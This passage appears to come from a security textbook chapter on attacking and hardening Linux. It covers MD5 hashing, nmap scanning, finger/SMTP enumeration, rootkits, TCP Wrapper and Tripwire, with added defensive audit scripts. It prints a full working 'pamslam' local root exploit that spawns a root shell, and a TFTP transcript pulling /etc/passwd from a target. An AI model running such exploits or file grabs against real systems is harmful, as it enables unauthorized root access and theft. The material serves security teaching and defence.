[The MD5 Algorithm]

MD5, a hash algorithm, improves upon the use of DES in many ways:

Infinite length passwords They are not limited to eight characters.

Much larger keyspace Here is an example of the output of MD5:

$1$rVh4/3C/$.xtBPA85bzw/2qBTOYY/R.

It is much longer than 13 characters, and the legal characters include punctuation and other characters.

Exportable It was not developed in part by the U.S. government, so it can be exported outside the United States.

The following Perl script illustrates an implementation of MD5:

#!/usr/bin/perl -w
# md5.pl
use strict;
use Digest::MD5;   # core module; replaces the old, unbundled MD5 module with the same add/digest API
print 'Please enter your password: ';
my $passwd = <STDIN>;
chomp $passwd;     # strip the trailing newline so it is not hashed along with the password
my $md5 = Digest::MD5->new;
$md5->add($passwd);
my $digest = $md5->digest();   # 16 raw bytes
print("Result is ", unpack("H*", $digest), "\n");   # shown as 32 hexadecimal characters

Here is an example of executing this program:

[jdoe@machine1 perl]$ ./md5.pl
Please enter your password: IamGod
Result is d8c653b74da4841b95b17d38a68f20cb

System administrators should be concerned about an attacker running a password cracker on their passwords. However, that does not mean these password cracking tools are all bad. System administrators can run these tools on their machines and try to crack the passwords therein, thereby determining which passwords on the system are weak and should be changed. It is recommended that these tools be run periodically.
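The $1$salt$hash string shown above is the MD5-based crypt format, and an administrator auditing a system wants to know which accounts still use it or the older 13-character DES format. The following Python script is an added example, not code from the book: it parses shadow-style lines, classifies each password field by its crypt scheme identifier, and lists the accounts whose hashes should be migrated. The lines in SAMPLE_SHADOW are constructed; the $1$ entry is the hash quoted above, the other values are made-up strings in the shape of each scheme.

```python
"""Audit which password-hash scheme each account in a shadow-style file uses.

Added example (not from the book). The MD5-based crypt format, $1$<salt>$<hash>,
is recognisable by its prefix; legacy DES crypt has no prefix and is exactly
13 characters from the crypt alphabet. The shadow lines below are constructed.
"""
import re

# crypt(3) scheme identifier -> (name, still acceptable for new passwords)
SCHEMES = {
    "1": ("MD5-crypt", False),
    "2a": ("bcrypt", True),
    "2b": ("bcrypt", True),
    "2y": ("bcrypt", True),
    "5": ("SHA-256-crypt", True),
    "6": ("SHA-512-crypt", True),
    "y": ("yescrypt", True),
}

DES_ALPHABET = re.compile(r"^[./0-9A-Za-z]{13}$")


def classify_hash(field):
    """Return (scheme_name, salt, acceptable) for one shadow password field."""
    if field in ("", "*") or field.startswith("!"):
        # Locked or passwordless account: nothing to crack, but worth reviewing.
        return ("locked/none", None, True)
    if field.startswith("$"):
        parts = field.split("$")          # parts[0] is '' (text before the first '$')
        ident = parts[1]
        name, ok = SCHEMES.get(ident, ("unknown $%s$" % ident, False))
        # For $1$, $5$, $6$ the next field is the salt; bcrypt and yescrypt put
        # parameters there instead, so treat it as an opaque first field.
        salt = parts[2] if len(parts) > 2 else ""
        return (name, salt, ok)
    if DES_ALPHABET.match(field):
        # Traditional DES crypt: 2-char salt, 11-char hash, 8-char password limit.
        return ("DES-crypt", field[:2], False)
    return ("unrecognised", None, False)


def audit_shadow(text):
    """Map username -> (scheme, salt, acceptable) for every line of shadow text."""
    report = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        report[fields[0]] = classify_hash(fields[1])
    return report


def weak_accounts(text):
    """Usernames whose stored hash uses a scheme that should be migrated."""
    return sorted(user for user, (_, _, ok) in audit_shadow(text).items() if not ok)


# Constructed sample. The $1$ hash is the one quoted in the text above; the
# $6$ and DES values are made-up strings in the right shape, not real hashes.
SAMPLE_SHADOW = """\
root:$6$Qn0dY3Lq$4w7fXlZp0m8aG2sVbHtNyUkR9jC1eDqWxEoIuTaSfPgKhLzMvB5rYn6c3d2.AbCdEfGhIjKlMnOpQrStUvWx:19000:0:99999:7:::
jdoe:$1$rVh4/3C/$.xtBPA85bzw/2qBTOYY/R.:19000:0:99999:7:::
legacy:abJnggxhB/yWI:19000:0:99999:7:::
svc:!!:19000:0:99999:7:::
"""

if __name__ == "__main__":
    for user, (scheme, salt, ok) in audit_shadow(SAMPLE_SHADOW).items():
        print(f"{user:8} {scheme:14} salt={salt!r:12} {'ok' if ok else 'MIGRATE'}")
```

Run it against a copy of /etc/shadow (readable only by root) and migrate any account it reports; on modern systems that is usually a matter of setting the ENCRYPT_METHOD in /etc/login.defs and having the user change their password.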

[Compressing, Installing, and Compiling]

In Linux, files are packaged and compressed in various ways. One of the most common packaging formats is the Tape Archiving program (Tar). Tar is a standard archive format and was originally developed as backup software for UNIX. It collects several files into a single file. It doesn't do file compression; therefore, a second program is needed. A program called gzip is one of the most common file compression programs. Compiling a package from a source tarball is not always a simple procedure. After uncompressing the package, you should search for a file called README, README.INSTALL, README.CONFIGURE, or something similar. This file will usually describe the configuration and installation process. Frequently, the source package includes a script called configure, which you execute to have the package autodetect your computer's installed libraries and configure itself appropriately. If so, the process consists of three commands:

./configure

make

make install

You might want to develop programs yourself, and if so, Linux offers you that capability. Linux comes with the GNU C compiler (GCC). This capability also comes in handy when you download a C program from a security site or would like to check out a piece of exploit code. With Linux, many programs might not be compiled for you. The process of compiling is not overly difficult, and a basic program and the steps required to compile it are shown here:

[root@mg /root]# vi hello.c
#include <stdio.h>
int main(int argc, char **argv)
{
    printf("Hello world!\n");
    return 0;
}

[root@mg /root]# gcc -o hello hello.c
[root@mg /root]# ./hello
Hello world!

First, the program code was written; in this case, the vi editor was used. Next, it was compiled with the gcc -o command. Finally, it was run by executing it from the terminal window, ./hello. Notice the ./ in front of the command. This ensures that Linux looks in the local directory for the specified executable.

[Scanning]

Scanning finds the hosts and determines what ports and applications they might be running. Here, you can see results that will begin to differentiate Windows and Linux systems. One big clue is open ports, such as 21, 37, 79, 111, and 6000. Those represent programs, such as secure shell (SSH), time, finger, sunrpc, and X11. Port scanners and OS fingerprinting software will be the tools of the trade. As an example, look at a scan run on a Linux system:

[root@mg /root]# nmap -O 192.168.13.10

Starting nmap V. 3.93 (www.insecure.org/nmap/)
Interesting ports on unix1 (192.168.13.10):
(The 1529 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
37/tcp open time
79/tcp open finger
111/tcp open sunrpc
139/tcp filtered netbios-ssn
513/tcp open login
1103/tcp open xaudio
2049/tcp open nfs
4045/tcp open lockd
6000/tcp open X11
7100/tcp open font-service
32771/tcp open sometimes-rpc5
32772/tcp open sometimes-rpc7
32773/tcp open sometimes-rpc9
32774/tcp open sometimes-rpc11
32775/tcp open sometimes-rpc13
32776/tcp open sometimes-rpc15
32777/tcp open sometimes-rpc17
Remote operating system guess: Solaris 2.6 - 2.7
Uptime 319.638 days (since Wed May 14 19:38:19 2005)

Nmap run completed -- 1 IP address (1 host up) scanned in 7 seconds

Notice that the ports shown from this scan are much different from what was seen from Windows scans earlier in the book. Ports such as 37, 79, 111, and 32771 are shown as open. You will also want to notice that Nmap has identified the OS as Solaris.
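The same report that tells an attacker what is listening tells an administrator what should not be. The Python below is an added example, not nmap's code or the book's: it parses nmap's classic text report into structured data, pulls out the open ports and the OS guess, flags the legacy services the text singles out, and diffs two scans of the same host so that newly opened ports stand out. SAMPLE_SCAN is the report printed above; SECOND_SCAN is a constructed follow-up scan with fewer services listening.

```python
"""Turn nmap's classic text report into a service inventory.

Added example, not part of the book and not nmap's own code. SAMPLE_SCAN is
the report printed above; SECOND_SCAN is a constructed later scan of the same
host, used to show how a defender diffs two scans over time.
"""
import re

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
OS_LINE = re.compile(r"^Remote operating system guess:\s*(.+)$")

# Services the text above singles out as tell-tale signs of an older UNIX host.
LEGACY_SERVICES = {"time", "finger", "sunrpc", "X11", "telnet", "login", "nfs"}


def parse_nmap(text):
    """Return {'ports': [(port, proto, state, service), ...], 'os_guess': str or None}."""
    ports, os_guess = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = PORT_LINE.match(line)
        if m:
            ports.append((int(m.group(1)), m.group(2), m.group(3), m.group(4)))
            continue
        m = OS_LINE.match(line)
        if m:
            os_guess = m.group(1).strip()
    return {"ports": ports, "os_guess": os_guess}


def open_ports(scan):
    """Port numbers nmap reported as open (filtered and closed are excluded)."""
    return sorted(port for port, _, state, _ in scan["ports"] if state == "open")


def legacy_exposures(scan):
    """Open (port, service) pairs that belong to the legacy service set."""
    return [(port, svc) for port, _, state, svc in scan["ports"]
            if state == "open" and svc in LEGACY_SERVICES]


def diff_scans(before, after):
    """Ports that became open, and ports that stopped being open, between two scans."""
    b, a = set(open_ports(before)), set(open_ports(after))
    return {"new_open": sorted(a - b), "no_longer_open": sorted(b - a)}


# The scan printed in the text above.
SAMPLE_SCAN = """\
Starting nmap V. 3.93 (www.insecure.org/nmap/)
Interesting ports on unix1 (192.168.13.10):
(The 1529 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
37/tcp open time
79/tcp open finger
111/tcp open sunrpc
139/tcp filtered netbios-ssn
513/tcp open login
1103/tcp open xaudio
2049/tcp open nfs
4045/tcp open lockd
6000/tcp open X11
7100/tcp open font-service
32771/tcp open sometimes-rpc5
32772/tcp open sometimes-rpc7
32773/tcp open sometimes-rpc9
32774/tcp open sometimes-rpc11
32775/tcp open sometimes-rpc13
32776/tcp open sometimes-rpc15
32777/tcp open sometimes-rpc17
Remote operating system guess: Solaris 2.6 - 2.7
"""

# Constructed: the same host after several services were switched off and sshd enabled.
SECOND_SCAN = """\
Port State Service
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
37/tcp open time
111/tcp open sunrpc
513/tcp open login
2049/tcp open nfs
6000/tcp open X11
Remote operating system guess: Solaris 2.6 - 2.7
"""

if __name__ == "__main__":
    scan = parse_nmap(SAMPLE_SCAN)
    print("OS guess:", scan["os_guess"])
    print("open ports:", open_ports(scan))
    print("legacy services exposed:", legacy_exposures(scan))
    print("changes since first scan:", diff_scans(scan, parse_nmap(SECOND_SCAN)))
```

Newer nmap versions print "PORT STATE SERVICE" in capitals and add a VERSION column with -sV, but the port lines keep the same leading port/proto token, so the regular expression still applies.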

Scanning is just the beginning. After any type of Linux or UNIX system is found, it will still require further probing to determine what’s running. Although exploiting the Windows null session might be out of the question, you can still use tools, such as banner grabbing. More importantly, if you think that the target is some flavor of UNIX, you have access to some programs not found in the world of Windows. For example, Finger, rwho, rusers, and Simple Mail Transfer Protocol (SMTP) can all be used to further leverage your knowledge.

[Finger]

Finger is a program that tells you the name associated with an email address. It might also tell you whether users are currently logged on at their system or their most recent logon session and possibly other information, depending on the data that is maintained about users on that computer. Finger originated as part of BSD UNIX.

Rwho and rusers are Remote Procedure Call (RPC) services that can give information about the various users on the system. Running rpcinfo -p against the system will allow an attacker to learn the status of rwho and rusers. Rusers depends on the rwho daemon. It lists the users logged in to all local machines, in who format (hostname, usernames).

Another potential tool to use for enumeration is Simple Mail Transfer Protocol (SMTP). SMTP can sometimes be helpful in identifying users. Attackers gain this information by using the SMTP vrfy (verify) and expn (expand) commands. These commands can be used to guess users on the system. Simply input names, and if the user exists, you will get back an RFC 822 email address with the @ sign. If the user doesn't exist, you'll get back a "user unknown" error message. Although a username is not enough for access, it is half of what's needed to get into most systems.

After a system has been scanned and enumerated, the next step is to gain access. Attempts to gain access can occur remotely or locally. Remote attacks are primarily carried out through one of four methods.

Exploit a process or program.

Exploit a Transmission Control Protocol (TCP) or User Datagram Protocol (UDP) listening service.

Exploit vulnerabilities in a system that is supplying routing services and providing security between two or more networks.

Exploit the user by having him initiate some type of action such as running an email attachment or visiting a hostile website.

Regardless of which method is used, the idea is to get some type of shell on the victim's machine. This can range from something as mindless as guessing usernames and passwords to more advanced backchannel attacks that rely on the victim's system to push the shell out to the attacker. Let's look at a simple example of exploiting a program. If the victim is found to be running TFTP, you can try to get the victim to hand over critical files.

[root@mg /root]# tftp 192.168.13.50
tftp> get /etc/passwd /root/passwdhack.txt
Received 1015 bytes in 0.0 seconds
tftp> quit
[root@mg /root]# more passwdhack.txt
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
operator:x:11:0:operator:/root:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
named:x:25:25:Named:/var/named:/bin/false
john:x:500:500:John:/home/jn:/bin/bash
clement:x:501:501:Clement:/cd/:/bin/csh
betty:x:502:502:Betty:/home/bd:/bin/pop
mike:x:503:503:Mike:/home/mg:/bin/bash

Although you could get the passwd file, you might have noticed that the passwords have been shadowed. This was not a complete success; however, the attacker was able to recover a list of users on the system. It is important to specify a destination directory when using TFTP to get the remote host’s /etc/passwd file. Otherwise, you will overwrite your own /etc/passwd file.
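Even with the hashes shadowed, the listing above hands out the account names and shows which of them can log in interactively, which is exactly what an administrator should review before an attacker does. The Python below is an added example (not from the book): it parses passwd(5) lines, lists the accounts with a login shell, and reports the findings worth acting on, such as extra UID 0 accounts, non-shadowed password fields, unusual shells, and system accounts whose shell field is empty (which passwd(5) says defaults to /bin/sh). SAMPLE_PASSWD is the listing retrieved above.

```python
"""Audit an /etc/passwd listing: what an exposed copy reveals, and what to fix.

Added example (not from the book). SAMPLE_PASSWD is the listing retrieved in
the text above. Even with hashes moved to /etc/shadow, the file gives away the
account list and shows which accounts get an interactive shell.
"""
PASSWD_FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")
NOLOGIN_SHELLS = {"/bin/false", "/sbin/nologin", "/usr/sbin/nologin"}
# Shells expected on a host like this one; anything else deserves a look.
KNOWN_SHELLS = {"/bin/bash", "/bin/sh", "/bin/csh", "/bin/tcsh", "/bin/ksh",
                "/bin/zsh", "/bin/sync", "/sbin/shutdown", "/sbin/halt"}
USUAL_HOMES = ("/home/", "/root", "/var/", "/sbin", "/bin", "/usr/", "/etc/")


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; malformed lines are skipped, not guessed."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        entry = dict(zip(PASSWD_FIELDS, fields))
        entry["uid"] = int(entry["uid"])
        entry["gid"] = int(entry["gid"])
        entries.append(entry)
    return entries


def interactive_accounts(entries):
    """Accounts that get a login shell. An empty shell field means /bin/sh (passwd(5))."""
    return [e["name"] for e in entries if e["shell"] not in NOLOGIN_SHELLS]


def findings(entries):
    """(account, issue) pairs an administrator should review."""
    issues = []
    for e in entries:
        if e["uid"] == 0 and e["name"] != "root":
            issues.append((e["name"], "additional UID 0 account"))
        if e["passwd"] not in ("x", "*") and not e["passwd"].startswith("!"):
            issues.append((e["name"], "password field is not shadowed"))
        if e["shell"] == "":
            issues.append((e["name"], "empty shell field defaults to /bin/sh; set a nologin shell"))
        elif e["shell"] not in NOLOGIN_SHELLS and e["shell"] not in KNOWN_SHELLS:
            issues.append((e["name"], "unusual shell " + e["shell"]))
        if not e["home"].startswith(USUAL_HOMES):
            issues.append((e["name"], "home directory outside the usual locations: " + e["home"]))
    return issues


# The /etc/passwd retrieved over TFTP in the text above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
operator:x:11:0:operator:/root:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
named:x:25:25:Named:/var/named:/bin/false
john:x:500:500:John:/home/jn:/bin/bash
clement:x:501:501:Clement:/cd/:/bin/csh
betty:x:502:502:Betty:/home/bd:/bin/pop
mike:x:503:503:Mike:/home/mg:/bin/bash
"""

if __name__ == "__main__":
    entries = parse_passwd(SAMPLE_PASSWD)
    print("accounts with a login shell:", interactive_accounts(entries))
    for account, issue in findings(entries):
        print(f"{account:10} {issue}")
```

On this listing the script reports nine system accounts with an empty shell field, betty's /bin/pop shell, and clement's home directory under /cd/, the kind of detail that is easy to miss when reading the file by eye.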

[Privilege Escalation]

Privilege escalation can best be described as the act of leveraging a bug or vulnerability in an application or operating system to gain access to resources, which normally would have been protected from an average user. These are attacks that are usually run locally and are concerned with increasing privilege. The objective is to force an application to perform actions that are running within a higher security context than intended by the designer, and the hacker is granted full local access and control. An example of a local attack is the pamslam vulnerability found in some older versions of Linux:

# pamslam - vulnerability in Redhat Linux 6.1 and PAM pam_start
# found by dildog@l0pht.com
cat > _pamslam.c << EOF
#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>
void _init(void)
{
setuid(geteuid());
system("/bin/sh");
}

EOF
echo -n .
echo -e auth\\trequired\\t$PWD/_pamslam.so > _pamslam.conf
chmod 755 _pamslam.conf
echo -n .
gcc -fPIC -o _pamslam.o -c _pamslam.c
echo -n o
ld -shared -o _pamslam.so _pamslam.o
echo -n o
chmod 755 _pamslam.so
echo -n O
rm _pamslam.c
rm _pamslam.o
echo O
/usr/sbin/userhelper -w ../../..$PWD/_pamslam.conf
sleep 1s
rm _pamslam.so
rm _pamslam.conf

[Linux RootKits]

After an attacker is on a Linux system and has made himself root, he will be concerned with maintaining access and covering his tracks. One of the best ways to maintain access is with a rootkit. A rootkit contains a set of tools and replacement executables for many of the operating system’s critical components. Once installed, a rootkit can be used to hide evidence of the attacker’s presence and to give the attacker backdoor access to the system. Rootkits require root access, but in return they give the attacker complete control of the system. The attacker can come and go at will and hide his activities from the administrator. Rootkits can contain log cleaners that attempt to remove all traces of an attacker’s presence from the log files.

Rootkits can be divided into two basic types: traditional, which replace binaries, and loadable kernel modules, which corrupt the kernel. Traditionally, rootkits replaced binaries, such as ls, ifconfig, inetd, killall, login, netstat, passwd, pidof, or ps, with trojaned versions. These trojaned versions have been written to hide certain processes or information from the administrators. Rootkits of this type are detectable because of the change in size of the trojaned binaries. Tools, such as md5sum and Tripwire, can be a big help in uncovering these types of hacks.

The second type of rootkit is the loadable kernel module (LKM). A kernel rootkit is loaded as a driver or kernel extension. Because kernel rootkits corrupt the kernel, they can do basically anything, including evading detection by many software methods. The best way to avoid these rootkits is simply to recompile the kernel without support for LKMs. Although the use of rootkits is widespread, many administrators still don't know much about them, so some of the most popular ones, such as Flea, T0rn, and Adore, are discussed in the following list:

Flea Once installed, Flea hides the attacker's actions from the administrator, making it easy for the attacker to reenter the system at a later date.

T0rn This rootkit is popular with hackers and is notable because it breaks netstat and its ps binary is 31336 bytes. Both these items can give you clues that the rootkit has been installed.

Adore Unlike the previous two rootkits, this one doesn't replace system binaries because it is an LKM rootkit. Adore hijacks system calls, wrapping each call and sanitizing its output so that the attacker's activity is hidden from the administrator.

Two major tools can be used to audit suspected rootkit attacks:

Chkrootkit An excellent tool that can be used to search for signs of a rootkit. It has the capability to examine system binaries for modification.

Rootkit Hunter Another tool that scans file and system binaries for known and unknown rootkits.

Finding the rootkit is not the same as seeing justice done. The overwhelming majority of individuals who attack systems go unpunished. The global nature of the Internet makes it hard to track hackers and bring them to justice.

[Hardening Linux]

To prevent Linux from being hacked, it is important to harden the system and secure services. Later in the chapter, we look at tools, such as Nessus and SAINT, that can be used to detect ways that attackers can get into your Linux systems. For now, you need to know that after those vulnerabilities are identified, they will need to be addressed. This can mean patching, removing, or hardening those services. Placing a firewall in front of critical servers is also an important step. Programs, such as ipchains and iptables, can also be used to filter and control traffic. Another easy solution is to remove programs and services if they aren't needed. This is known as the principle of least privilege. Some of the programs and services that are considered nonessential might include the following:

Wget A noninteractive tool for fetching data over HTTP/HTTPS and FTP.

Finger Lets you retrieve basic information about an Internet user or host.

Lynx Text-based browser that supports both HTTP/HTTPS and FTP.

Curl A wget-like tool that also supports protocols such as Telnet and gopher.

SCP Secure file transfers using the SSH protocol.

FTP The command-line FTP client.

Telnet The Linux command-line Telnet client.

TFTP Trivial FTP.

Ping Can also be used as a rather blunt DoS tool.

Turning off unneeded services, removing unnecessary programs, and applying the latest security patches is known as hardening a system.

Chroot basically puts a program in a sandbox. The term sandbox refers to the concept of limiting the activity of a program and applying boundaries. More accurately, chroot redefines the root directory, or /, for a program or login session. Everything outside the directory you hand to chroot doesn't exist as far as the program is concerned. It effectively jails a process into one part of the file system from which the process cannot escape. Because of this lockdown, it is important to remember that any files a chrooted program needs for proper functionality must be present inside the jail. Chroot is commonly used by programs such as FTP, BIND, mail, and Apache.

TCP Wrapper is another tool that can be used to harden Linux. Wietse Venema developed the TCP Wrapper program to protect computers from hacking attacks. For many years, this was one of the default methods used to harden Linux. It's now being replaced by xinetd, which is considered more granular. Network services such as Finger, FTP, Rlogin, Telnet, and TFTP can be configured for TCP Wrapper use. More information about TCP Wrapper follows:

TCP Wrapper allows you to specify which hosts are allowed access.

TCP Wrapper is activated by having inetd call the TCP Wrapper daemon.

TCP Wrapper can be used with TCP or UDP.

Two files are used to verify access: hosts.allow and hosts.deny.

The TCP Wrapper service works by inserting itself between the service and the outside world. You use two files for the management of access control:

hosts.allow Lists all hosts with connectivity to the system that can connect to a specific service.

hosts.deny Works in the same fashion as most ACLs because if it is not expressly permitted, access is then denied.
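The order in which tcpd consults the two files is what makes hosts.deny behave like an ACL: a (daemon, client) pair that matches hosts.allow is granted, otherwise one that matches hosts.deny is refused, and a pair matching neither file is granted. The Python below is an added example, not tcpd's code and not from the book; it models that documented hosts_access(5) evaluation order so a rule set can be tested before it is deployed. It covers the common client patterns only (ALL, LOCAL, exact host or address, leading-dot domain suffix, trailing-dot address prefix, net/mask, and EXCEPT); the rules and client addresses in the sample are constructed.

```python
"""Evaluate TCP Wrapper (tcpd) access decisions for hosts.allow / hosts.deny.

Added example, not tcpd's own code and not from the book: a Python model of
the hosts_access(5) evaluation order (allow file first, then deny file, then
default allow). Only the common client patterns are modelled: ALL, LOCAL,
exact host/address, leading dot (domain suffix), trailing dot (address
prefix), net/mask with a dotted mask, and EXCEPT. IPv4 only. All rules and
client names/addresses below are constructed.
"""
import ipaddress
import re


def _match_pattern(pattern, client):
    """Does one hosts_access pattern match a client host name or IPv4 address?"""
    pattern = pattern.strip()
    if pattern == "ALL":
        return True
    if pattern == "LOCAL":
        return "." not in client            # a name without a dot
    if pattern.startswith("."):
        return client.endswith(pattern)     # domain suffix, e.g. .example.com
    if pattern.endswith("."):
        return client.startswith(pattern)   # address prefix, e.g. 192.168.13.
    if "/" in pattern:
        net, mask = pattern.split("/", 1)
        try:
            return ipaddress.IPv4Address(client) in ipaddress.IPv4Network((net, mask), strict=False)
        except ValueError:
            return False                    # client is a host name, or a malformed rule
    return pattern == client


def _match_list(list_text, client):
    """A daemon or client list: 'a b c' or 'a b EXCEPT c d'."""
    list_text = list_text.strip()
    if " EXCEPT " in f" {list_text} ":
        included, excluded = re.split(r"\s+EXCEPT\s+", list_text, maxsplit=1)
        return _match_list(included, client) and not _match_list(excluded, client)
    return any(_match_pattern(p, client) for p in re.split(r"[\s,]+", list_text) if p)


def _file_matches(rules_text, daemon, client):
    """First matching 'daemon_list : client_list' rule wins; comments and blanks are skipped."""
    for raw in rules_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = [p.strip() for p in line.split(":")]
        if len(parts) < 2:
            continue
        if _match_list(parts[0], daemon) and _match_list(parts[1], client):
            return True
    return False


def tcpd_decision(hosts_allow, hosts_deny, daemon, client):
    """Mirror tcpd: hosts.allow first, then hosts.deny, then access is granted."""
    if _file_matches(hosts_allow, daemon, client):
        return "allow"
    if _file_matches(hosts_deny, daemon, client):
        return "deny"
    return "allow"   # matched neither file: tcpd grants access


# Constructed sample rule set.
HOSTS_ALLOW = """\
# only the management LAN may reach the r-services
in.rlogind in.telnetd : 192.168.13.0/255.255.255.0
in.ftpd : LOCAL, .example.com EXCEPT guest.example.com
sshd : ALL
"""
HOSTS_DENY = "ALL : ALL\n"

if __name__ == "__main__":
    for daemon, client in [("in.telnetd", "192.168.13.77"), ("in.telnetd", "10.0.0.5"),
                           ("in.ftpd", "fileserver"), ("in.ftpd", "guest.example.com"),
                           ("in.fingerd", "anywhere.net")]:
        print(f"{daemon:12} from {client:20} -> {tcpd_decision(HOSTS_ALLOW, HOSTS_DENY, daemon, client)}")
```

The last test case below is the one administrators most often get wrong: with an empty hosts.deny, a daemon that appears in no rule at all is reachable from anywhere, which is why the "ALL : ALL" line in hosts.deny is the conventional closing rule.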

Tripwire is another valuable tool that can be used to secure Linux systems. Tripwire is the most commonly used file integrity program. It performs integrity checking by using cryptographic checksums. Tripwire can help you identify if any file tampering has occurred. It is commonly used with IDS systems because it can be used to maintain a snapshot of the system while in a known good state. If rootkits or other changes are made, Tripwire can detect it. Tripwire performs its magic by creating a one-way hash value for files and directories. This hash is stored, and then periodically new scans are performed. The new scanned value is compared against the stored ones. If the two values do not match, a flag is set and an administrator must take action. The Tripwire policy file is twpol.txt and can be found in the /etc/tripwire directory.
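The hash-and-compare cycle described above, and the md5sum check against trojaned binaries mentioned in the rootkit section, come down to the same procedure: record a digest (and the size, which alone betrays the 31336-byte t0rn ps) for every file, store it somewhere the intruder cannot edit, and later rescan and diff. The Python below is an added example, not Tripwire's code and not from the book. It uses SHA-256 rather than MD5 because MD5 collisions are practical today; the files it baselines and then tampers with live in a temporary directory the demo creates itself.

```python
"""Tripwire-style integrity baseline and comparison.

Added example, not Tripwire's own code and not from the book. It records a
SHA-256 digest, size and permission bits for every regular file under a
directory, saves that baseline as JSON, and compares a later scan against it.
The files under the temporary directory are constructed by the demo itself.
"""
import hashlib
import json
import os
import stat
import tempfile


def file_record(path):
    """Digest, size and mode of one regular file."""
    st = os.lstat(path)
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return {"sha256": h.hexdigest(), "size": st.st_size, "mode": stat.S_IMODE(st.st_mode)}


def build_baseline(root):
    """Map path-relative-to-root -> record for every regular file under root."""
    baseline = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue   # symlinks and special files are out of scope here
            baseline[os.path.relpath(full, root)] = file_record(full)
    return baseline


def compare(baseline, current):
    """The three lists an administrator acts on: added, removed, changed files."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])
    return {"added": added, "removed": removed, "changed": changed}


def save_baseline(baseline, path):
    # In real use the baseline and the checker itself belong on read-only media
    # or another host: an intruder who can rewrite the baseline defeats the check.
    with open(path, "w") as f:
        json.dump(baseline, f, indent=1, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def demo():
    """Constructed scenario: baseline a fake bin directory, then tamper with it."""
    root = tempfile.mkdtemp(prefix="integrity-demo-")
    for name, body in {"ps": b"genuine ps\n", "ls": b"genuine ls\n", "netstat": b"genuine netstat\n"}.items():
        with open(os.path.join(root, name), "wb") as f:
            f.write(body)
    fd, baseline_path = tempfile.mkstemp(suffix=".json")
    os.close(fd)
    save_baseline(build_baseline(root), baseline_path)

    # Simulated rootkit install: replace ps, drop a hidden file, delete netstat.
    with open(os.path.join(root, "ps"), "wb") as f:
        f.write(b"trojaned ps that hides the attacker's processes\n")
    with open(os.path.join(root, ".hidden"), "wb") as f:
        f.write(b"backdoor configuration\n")
    os.remove(os.path.join(root, "netstat"))

    return compare(load_baseline(baseline_path), build_baseline(root))


if __name__ == "__main__":
    print(demo())
```

A kernel-level (LKM) rootkit can lie to this scanner about what the files contain, which is why the text recommends a kernel without module support for hosts where that is practical; for traditional binary-replacement rootkits the comparison is decisive.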

[Logging]

Although logging will not prevent an attack, it is a useful tool for determining what happened. Linux will allow you to log systems, applications, and protocols. The output of most logs is kept in the /var/log directory. If you are curious about who has logged in to the system, you can use the lastlog file. The /var/log/lastlog file tracks the last login of each user account into the system.

Linux is gaining popularity and is fast becoming a stable, industry-strength OS. Once the IP address of a target system is known, an attacker can begin port scanning, looking for holes in the system for gaining access; Nmap is a popular tool for this. Password cracking tools are available for Linux as well. Sniffers and packet assembly/analysis tools for Linux give attackers the same edge they have when dealing with other OSs. Attackers with root privileges can engage in session hijacking as well. Trojans, backdoors, and worms are also prevalent in the Linux environment.
As with any other system, a well-developed, integrated procedure must be put in place to counter the threats that exist.